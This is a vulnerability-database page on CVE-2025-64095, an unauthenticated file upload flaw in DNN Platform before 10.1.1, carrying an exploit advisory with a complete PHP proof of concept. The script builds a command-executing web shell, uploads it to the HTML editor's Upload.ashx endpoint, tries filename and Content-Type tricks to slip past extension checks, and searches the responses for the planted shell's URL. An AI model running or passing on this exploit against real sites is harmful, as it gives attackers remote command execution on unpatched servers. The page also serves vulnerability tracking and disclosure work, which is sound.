| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| Exploit for Unrestricted Upload of File with Dangerous Type in Dnnsoftware Dotnetnuke | 6 Nov 202520:20 | โ | githubexploit | |
| Exploit for Unrestricted Upload of File with Dangerous Type in Dnnsoftware Dotnetnuke | 18 Nov 202518:53 | โ | githubexploit | |
| CVE-2025-64095 | 29 Oct 202500:01 | โ | circl | |
| DNN ไปฃ็ ้ฎ้ขๆผๆด | 28 Oct 202500:00 | โ | cnnvd | |
| CVE-2025-64095 | 28 Oct 202521:46 | โ | cve | |
| CVE-2025-64095 DNN Insufficient Access Control - Image Upload allows for Site Content Overwrite | 28 Oct 202521:46 | โ | cvelist | |
| EUVD-2025-36564 | 29 Oct 202521:48 | โ | euvd | |
| DNN Insufficient Access Control - Image Upload allows for Site Content Overwrite | 29 Oct 202521:48 | โ | github | |
| U.S. Dept Of Defense: DNN - Unrestricted Arbitrary File Upload #โโโโโโโโ | 6 Nov 202511:53 | โ | hackerone | |
| DNN - Unrestricted Arbitrary File Upload | 4 Feb 202607:00 | โ | nuclei |
=============================================================================================================================================
| # Title : DNN Platform Preโ10.1.1 Versions Unauthenticated Arbitrary File Upload |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://dnncommunity.org/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211134/ & CVE-2025-64095
[+] Summary : a vulnerability affecting DNN Platform (formerly DotNetNuke).Versions prior to 10.1.1 allow unauthenticated arbitrary file upload through the default HTML editor upload endpoint.
Missing permission checks in the file upload controller allowed attackers to upload files without authentication, and in some cases overwrite existing files.
[+] An attacker could:
Upload arbitrary files
Inject malicious content
Execute scripts depending on server configuration
[+] Vulnerable Versions :
All versions before 10.1.1 (e.g., 10.1.0, 10.0.x, 9.x, etc.)
[+] POC : * Usage: Save this file as: exploit.php
Run: php exploit.php
<?php
/*
PoC for CVE-2025-64095 - Unauthenticated File Upload
Author: Indoushka
*/
$target = "http://victim.com/Providers/HtmlEditorProviders/DNNConnect.CKE/Upload.ashx";
$file_to_upload = "shell.php";
// ู
ุญุชูู ุงูู
ูู ุงูุฐู ุณูุชู
ุฑูุนู (ุดู PHP ุจุณูุท)
$php_shell = '<?php
if(isset($_GET["cmd"])) {
system($_GET["cmd"]);
} else {
echo "Shell Active - " . gethostname();
}
?>';
file_put_contents($file_to_upload, $php_shell);
// ู
ุญุงููุงุช ูุฃุณู
ุงุก ู
ููุงุช ู
ุฎุชููุฉ ูุชุฌุงูุฒ ุงูุญู
ุงูุฉ
$filenames = [
"shell.php",
"shell.php5",
"shell.phtml",
"shell.php.test",
"shell.php.jpg", // ูุฏ ูุชู
ุชุฌุงูู ุงูุงู
ุชุฏุงุฏ ุงูุซุงูู ูู ุจุนุถ ุงูุฃูุธู
ุฉ
"shell.php%00.jpg", // null byte injection (ุฅุฐุง ูุงู ุงููุธุงู
ู
ุนุฑุถ)
"shell.php;.jpg",
"shell.php ",
];
foreach ($filenames as $filename) {
echo "\n[+] Trying filename: $filename\n";
// ุงุนุฏุงุฏ ุงูุทูุจ
$boundary = "----Indoushka" . md5(time() . rand(1, 1000));
$post_data = "--$boundary\r\n";
$post_data .= "Content-Disposition: form-data; name=\"upload\"; filename=\"$filename\"\r\n";
$post_data .= "Content-Type: text/plain\r\n\r\n"; // ูุฏ ุชุญุชุงุฌ ูุชุบููุฑ Content-Type
$post_data .= $php_shell . "\r\n";
$post_data .= "--$boundary--\r\n";
// ุงุฑุณุงู ุงูุทูุจ
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
"Content-Type: multipart/form-data; boundary=$boundary",
"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"X-Forwarded-For: 127.0.0.1"
));
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
// ุฅุถุงูุฉ ุจุฑููุณู ููุชุตุญูุญ (ุงุฎุชูุงุฑู)
// curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8080");
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($response === false){
echo "Error: " . curl_error($ch) . "\n";
} else {
echo "[+] HTTP Code: $http_code\n";
echo "[+] Response (first 500 chars):\n" . substr($response, 0, 500) . "\n";
// ุงูุชุญูู ู
ู ูุฌูุฏ ู
ุคุดุฑุงุช ุนูู ูุฌุงุญ ุงูุฑูุน
if (strpos($response, 'success') !== false ||
strpos($response, 'url') !== false ||
strpos($response, '.php') !== false) {
echo "[!] Possible successful upload detected!\n";
// ู
ุญุงููุฉ ุงุณุชุฎุฑุงุฌ ุฑุงุจุท ุงูู
ูู ุงูู
ุฑููุน
preg_match_all('/"(http[^"]+\.php[^"]*)"/i', $response, $matches);
if (!empty($matches[1])) {
echo "[+] Found potential shell URLs:\n";
foreach ($matches[1] as $url) {
echo " - $url\n";
}
}
}
}
curl_close($ch);
sleep(1); // ุชุฌูุจ rate limiting
}
// ู
ุญุงููุฉ ุจุฑูุน ู
ุน Content-Type ู
ุฎุชูู
echo "\n[+] Trying with different Content-Type...\n";
$boundary = "----Indoushka" . md5(time());
$post_data = "--$boundary\r\n";
$post_data .= "Content-Disposition: form-data; name=\"upload\"; filename=\"shell.php\"\r\n";
$post_data .= "Content-Type: image/jpeg\r\n\r\n"; // Content-Type ู
ุถูู
$post_data .= $php_shell . "\r\n";
$post_data .= "--$boundary--\r\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
"Content-Type: multipart/form-data; boundary=$boundary"
));
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
echo "[+] Response with fake Content-Type: " . substr($response, 0, 300) . "\n";
curl_close($ch);
// ุชูุธูู ุงูู
ูู ุงูู
ุญูู
if (file_exists($file_to_upload)) {
unlink($file_to_upload);
}
echo "\n[!] Remember: Use only on systems you own or have permission to test!\n";
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation